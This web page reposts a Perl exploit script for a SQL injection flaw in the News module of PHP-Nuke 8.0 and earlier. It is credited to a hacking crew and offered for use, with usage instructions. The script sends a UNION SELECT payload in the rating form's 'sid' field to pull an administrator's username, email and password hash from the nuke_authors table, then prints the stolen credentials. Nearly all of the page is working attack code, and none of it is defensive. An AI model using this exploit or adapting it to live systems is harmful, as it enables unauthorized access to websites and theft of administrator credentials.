Home / os / win7

PHP-Nuke <= 8.0 (News) Remote SQL Injection Exploit

Posted on 22 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>PHP-Nuke &lt;= 8.0 (News) Remote SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================
PHP-Nuke &lt;= 8.0 (News) Remote SQL Injection Exploit
===================================================


#!/usr/bin/perl
#[0-Day] PHP-Nuke &lt;= 8.0 (News) Remote SQL Injection Exploit
#Created: 2010.04.23 after 3 days the bug was discovered.
#Author/s: Dante90 &amp; The:Paradox, WaRWolFz Crew
#Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat
#Web Site: www.warwolfz.org

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Headers;

my $UserName = shift or usage();
my $HostName = &quot;http://www.victime_site.org/path/&quot;; #Insert Victime Web Site Link

my $Method = HTTP::Request-&gt;new(POST =&gt; $HostName.'modules.php?name=News');
my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
			agent =&gt; 'Mozilla/5.0',
			max_redirect =&gt; 0,
			cookie_jar =&gt; $Cookies,
			default_headers =&gt; HTTP::Headers-&gt;new,
		) or die $!;
my $Referrer = &quot;sid=Dante90, WaRWolFz Crew http://www.warwolfz.org/&amp;op=rate_complete&amp;score=1&quot;;

sub SQL_Injection{
	my ($Victime) = @_;
	return &quot;-2' UNION#
 SELECT CONCAT_WS(CHAR(32,58,32),`aid`,`name`,`email`,`pwd`) FROM `nuke_authors` WHERE `aid`='${Victime}'-- &quot;;
}

$Method-&gt;referer($HostName.'modules.php?name=News');
$Method-&gt;content_type('application/x-www-form-urlencoded');
$Method-&gt;content(&quot;sid=&quot;.SQL_Injection($UserName).&quot;&amp;op=rate_complete&amp;score=1&quot;);
my $Response = $UserAgent-&gt;request($Method);
$Response-&gt;is_success or die &quot;$HostName : &quot;,$Response-&gt;message,&quot;
&quot;;

if($Response-&gt;content =~ /([a-zA-Z0-9-_.]{2,15}) : ([a-zA-Z0-9-_.]{2,15}) : ([a-zA-Z0-9.@]{1,50}) : ([a-f0-9]{32})/i){
	refresh($HostName, $1, $2, $3, $4);
	print &quot; * Exploit Successfully Executed                      *
&quot;;
	print &quot; ------------------------------------------------------

&quot;;
	system(&quot;pause&quot;);
}else{
	refresh($HostName, &quot;&quot;, &quot;&quot;, &quot;&quot;, &quot;&quot;);
	print &quot; * Error extracting sensible data.
&quot;;
	print &quot; * Exploit Failed                                     *
&quot;;
	print &quot; ------------------------------------------------------ 

&quot;;
}


sub usage{
	system(&quot;cls&quot;);
	{
		print &quot; 
 [0-Day] PHP-Nuke &lt;= 8.0 (News) Remote SQL Injection Exploit
&quot;;
		print &quot; ------------------------------------------------------ 
&quot;;
		print &quot; * USAGE:                                             *
&quot;;
		print &quot; * cd [Local Disk]:\[Directory Of Exploit]\           *
&quot;;
		print &quot; * perl name_exploit.pl [username]                    *
&quot;;
		print &quot; ------------------------------------------------------ 
&quot;;
		print &quot; *   Powered By Dante90 &amp; The:Paradox, WaRWolFz Crew  *
&quot;;
		print &quot; * www.warwolfz.org - dante90_founder[at]warwolfz.org *
&quot;;
		print &quot; ------------------------------------------------------ 
&quot;;
	};
	exit;
}

sub refresh{
	system(&quot;cls&quot;);
	{
		print &quot; 
 [0-Day] PHP-Nuke &lt;= 8.0 (News) Remote SQL Injection Exploit
&quot;;
		print &quot; ------------------------------------------------------ 
&quot;;
		print &quot; * USAGE:                                             *
&quot;;
		print &quot; * cd [Local Disk]:\[Directory Of Exploit]\           *
&quot;;
		print &quot; * perl name_exploit.pl [username]                    *
&quot;;
		print &quot; ------------------------------------------------------ 
&quot;;
		print &quot; *   Powered By Dante90 &amp; The:Paradox, WaRWolFz Crew  *
&quot;;
		print &quot; * www.warwolfz.org - dante90_founder[at]warwolfz.org *
&quot;;
		print &quot; ------------------------------------------------------ 
&quot;;
	};
	print &quot; * Victime Site: &quot; . $_[0] . &quot;
&quot;;
	print &quot; * User ID: &quot; . $_[1] . &quot;
&quot;;
	print &quot; * Username: &quot; . $_[2] . &quot;
&quot;;
	print &quot; * Password: &quot; . $_[4] . &quot;
&quot;;
	print &quot; * E-Mail: &quot; . $_[3] . &quot;
&quot;;
}

#WaRWolFz Crew


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-22]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP